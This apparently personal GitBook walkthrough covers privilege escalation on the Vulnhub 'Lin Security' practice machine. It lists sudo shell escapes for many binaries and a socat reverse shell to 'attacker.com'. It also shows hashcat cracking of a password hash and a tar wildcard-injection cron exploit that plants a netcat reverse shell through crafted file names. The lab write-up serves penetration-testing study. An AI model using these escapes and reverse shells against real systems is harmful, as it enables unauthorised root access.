✒️
Report
  • Introduction
  • MCC 2022
    • ThisIsSoEasy1
    • Hermoso
  • Vulnhub
    • Kioptrix
      • Level 1.1
      • Level 1.2
      • Level 1.3
      • Level 1.4
    • Symfonos
      • Symfonos 1
      • Symfonos 2
      • Symfonos 3
      • Symfonos 4
    • DC
      • DC6
      • DC9
    • Sar1
    • Toppo 1
    • Prime 1
    • Bob 1.0.1
    • Escalate Linux < NOT FINISH >
    • Djinn 1
    • Golden Eye 1
    • Hackme1
    • Stapler 1
    • DerpNStink
    • Lin Security
    • W34KN3SS
  • Symfonos 5 <NOT WORKING>
  • Hackthebox
    • Delivery (Easy)
    • Spectra (Easy)
    • Script Kiddie (Easy)
    • Armageddon (Easy)
    • Love (Easy)
    • Knife (Easy)
    • Traverxec (Easy)
    • Bastion (Easy)
    • Heist (Easy)
    • Shocker (Easy)
    • Active (Easy)
    • The Notebook (Medium)
    • Paper (Easy)
    • Jerry (Easy)
    • Networked (Easy)
    • Swagshop (Easy) - Not Working
    • Lame (Easy)
Powered by GitBook
On this page
  • Exploitation
  • Privilege Escalation
  • Method 1 ( User Rights)
  • Method 2 hash passwords
  • Method 3 cron jobs

Was this helpful?

  1. Vulnhub

Lin Security

Lin Security Vulnhub walkthrough

PreviousDerpNStinkNextW34KN3SS

Last updated 4 years ago

Was this helpful?

Exploitation

This machine does not need enumeration because the author already gave us a credentials and this machine is let us to practice our privilege escalation skills

After logged in using the credentials

Privilege Escalation

we then can type sudo -l

We can see a lot of user rights exploit

Method 1 ( User Rights)

/bin/ash

sudo ash

/bin/ed

sudo ed
!/bin/sh

/usr/bin/env

sudo env /bin/sh

/usr/bin/expect

sudo expect -c 'spawn /bin/sh; interact'

/usr/bin/find

sudo find . -exec /bin/sh \; -quit

/usr/bin/more

TERM= sudo -E more /etc/profile
!/bin/sh

/usr/bin/scp

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

/usr/bin/socat

On our machine

socat file:`tty`,raw,echo=0 tcp-listen:12345

On target machine

sudo sh -c 'cp $(which socat) .; chmod +s ./socat'

RHOST=attacker.com
RPORT=12345
./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane

/usr/bin/ssh

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

/usr/bin/pico

sudo pico
^R^X
reset; sh 1>&0 2>&0

/usr/bin/rvim

sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

/usr/bin/tclsh

sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

/usr/bin/git

sudo git -p help config
!/bin/sh

Method 2 hash passwords

When we cat /etc/passwd, we can see all the users available in the system, then we can see a user has a hash

Put it at hashcat and we can decode the hash

hashcat AzER3pBZh6WZE -m 1500 /usr/share/wordlists/rockyou.txt

We got the password and su to user insecurity, then we can get root

Method 3 cron jobs

If we type cat /etc/crontab we can see that there is a backup running every 1 minute

If we la -la /etc/backups

On our machine

nc -nlvp 9999

On target machine

echo "mkfifo /tmp/lhennp; nc 192.168.1.102 9999 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *

After wait for 1 minute then we can get a shell.

We can go to this and get the cheat sheet from it hehe. A lot is very easy so we are not gonna cover everything.

We can see that tar file. If you read this article on this , here we have a very details explanation

website
website